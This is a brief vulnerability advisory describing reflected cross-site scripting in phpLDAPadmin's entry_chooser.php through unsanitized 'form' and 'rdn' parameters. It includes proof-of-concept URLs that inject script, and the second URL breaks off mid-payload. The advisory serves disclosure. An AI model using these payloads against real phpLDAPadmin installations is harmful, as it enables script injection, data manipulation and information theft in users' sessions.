Software Description phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information. Vulnerability Description $request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage as it is demonstrated in this PoC video. Proof of Concept (PoC) XSS via the 'form' parameter: http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass): http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%